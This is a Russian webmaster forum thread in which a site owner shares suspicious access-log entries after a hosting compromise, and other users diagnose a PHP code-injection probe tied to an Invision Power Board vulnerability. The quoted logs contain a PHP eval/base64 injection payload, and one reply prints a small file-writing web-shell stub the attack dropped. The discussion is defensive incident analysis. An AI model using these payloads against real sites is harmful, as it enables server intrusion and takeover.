Подозрительный лог

12
merser
На сайте с 21.06.2005
Offline
176
2053

Нашел сегодня в логе на одном сайте такое вот

209.249.12.207 - - [05/Nov/2012:07:38:42 +0400] "HEAD /index.php HTTP/1.1" 301 - "-" "MSIE 7.0; Windows 5.1; compatible"
209.249.12.207 - - [05/Nov/2012:07:38:42 +0400] "HEAD / HTTP/1.1" 200 - "-" "MSIE 7.0; Windows 5.1; compatible"
209.249.12.207 - - [05/Nov/2012:07:38:44 +0400] "HEAD /index.php HTTP/1.1" 301 - "-" "MSIE 7.0; Windows 5.1; compatible"
209.249.12.207 - - [05/Nov/2012:07:38:44 +0400] "HEAD / HTTP/1.1" 200 - "-" "MSIE 7.0; Windows 5.1; compatible"
209.249.12.207 - - [05/Nov/2012:07:38:46 +0400] "HEAD /index.php?<?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A59DC2C8]));exit;?> HTTP/1.1" 200 - "-" "MSIE 7.0; Windows 5.1; compatible"
209.249.12.207 - - [05/Nov/2012:07:38:48 +0400] "GET /cache/4d01a1812c320b0b54c9065577aa2276.php HTTP/1.1" 404 57193 "-" "MSIE 7.0; Windows 5.1; compatible"

Помогите разобраться что это вообще было

RUALL - Реклама и продвижение - ( https://ruall.biz/?ref=51 )
Den73
На сайте с 26.06.2010
Offline
523
#1

ботики, а что такого то? если открыть access.log сервера с кучей сайтов, например шаред хостинга то там еще и не такое можно увидеть)))

merser
На сайте с 21.06.2005
Offline
176
#2

По большей части меня смущает PHP конструкция встроенная в HEAD запрос (выделено красным)

Den73
На сайте с 26.06.2010
Offline
523
#3
merser:
По большей части меня смущает PHP конструкция встроенная в HEAD запрос (выделено красным)

ну проверяют возможность выполнения кода, это же очевидно

O3
На сайте с 17.11.2008
Offline
127
#4

Не осилил.

merser:

209.249.12.207 - - [05/Nov/2012:07:38:48 +0400] "GET /cache/4d01a1812c320b0b54c9065577aa2276.php HTTP/1.1" 404 57193 "-" "MSIE 7.0; Windows 5.1; compatible"

И тут интерестно, наверно ищет жумлу с конкретным шаблоном.

Может в шаблоне дыра.

Много там еще странных запросом с данного ІР?

Сканнер наверно.

merser
На сайте с 21.06.2005
Offline
176
#5
ну проверяют возможность выполнения кода, это же очевидно

Т.е. это можно рассматривать как попытку взлома, я правильно понял?

И тут интерестно, наверно ищет жумлу с конкретным шаблоном.
Может в шаблоне дыра.

да, сайт на JOOMLA

Много там еще странных запросом с данного ІР?

нет за последние 3 дня это все

Аккаунт на хостинге был взломан, замена всех паролей ничего не давала

Эта гадость смогла пролезть даже в корневую папку хостинга, на 2 уровня выше корневых папок сайтов

Сейчас восстановил сайты на др. хостинге, на разных аккаунтах и слежу за активностью

O3
На сайте с 17.11.2008
Offline
127
#6
209.249.12.207 - - [05/Nov/2012:07:38:46 +0400] "HEAD /index.php?<?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A59DC2C8]));exit;?> HTTP/1.1" 200 - "-" "MSIE 7.0; Windows 5.1; compatible"
209.249.12.207 - - [05/Nov/2012:07:38:48 +0400] "GET /cache/4d01a1812c320b0b54c9065577aa2276.php HTTP/1.1" 404 57193 "-" "MSIE 7.0; Windows 5.1; compatible"

наверно два запроса связаны.

первый, наверно, должен создать 4d01a1812c320b0b54c9065577aa2276.php

Сделайте себе первый запрос и посмотрите - появится-ли файл.

merser
На сайте с 21.06.2005
Offline
176
#7
oleg3d:
наверно два запроса связаны.
первый, наверно, должен создать 4d01a1812c320b0b54c9065577aa2276.php

Сделайте себе первый запрос и посмотрите - появится-ли файл.

Сделал запрос в браузере, файл не появился,

также надо учитывать что он находится на др хостинге

dkameleon
На сайте с 09.12.2005
Offline
386
#8
merser:
Сделал запрос в браузере, файл не появился,

кстати, не похоже, что и в первом случае он появился.

последняя строка отдает 404

Дизайн интерьера (http://balabukha.com/)
R1
На сайте с 07.11.2012
Offline
0
#9
merser:
Сделал запрос в браузере, файл не появился

И не появится.

Т.к. нужен ( в Вашем случае ) HTTP заголовок ( A59DC2C8 ) от клиента который бы содержал base64 закодированный сценарий для атаки.

--

Меня эта **ень тоже поразила, сайт на IPB.

Сейчас пытаюсь повторить все что бот делал.

--

В общем, первые действия, это они как то инициируют создание файла типа:


==============================================================================
URL: /index.php/index.php
Date: Mon, 05 Nov 2012 20:28:56 +0000
IP Address: 74.208.213.252
Time Taken: 0.00023
<?php print(md5(123456));echo file_put_contents($_POST[f],$_POST); ?>

==============================================================================
==============================================================================
========================= END ===================================
========================= /index.php? ===================================
==============================================================================

Дальше уже через него создают другой, более большой файл ( 92 КБ ) в котором текст читаем но на первый взгляд не понятен.

Выполняет какой то поиск(?).

---------- Добавлено 07.11.2012 в 23:14 ----------

Немного поискав, нашел конечный код который дает создать файл который я представил в теге code

Это функция writeDebugLog класса БД, которая вызывается с нестандартными параметрами.

sergv
На сайте с 13.04.2006
Offline
433
#10

IPB форумы 3.1, 3.2 и 3.3 версий подвержены уязвимости.

Как это работает и что где создается человек описал тут

Доп инфа тут

Заплатки тут для рус версий, а тут от разрабов для инглиш

Сам только что вычистил 2 инвижна 3.3.4 и 3.1.4 от этой гадости....

https://REGHOME.ru - регистрация и продление доменов от 169₽ в российских и международных зонах по честным ценам без звездочек. (R01, WebNames, UK2). Принимаем Ю-Money, Visa, MasterCard, Мир
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий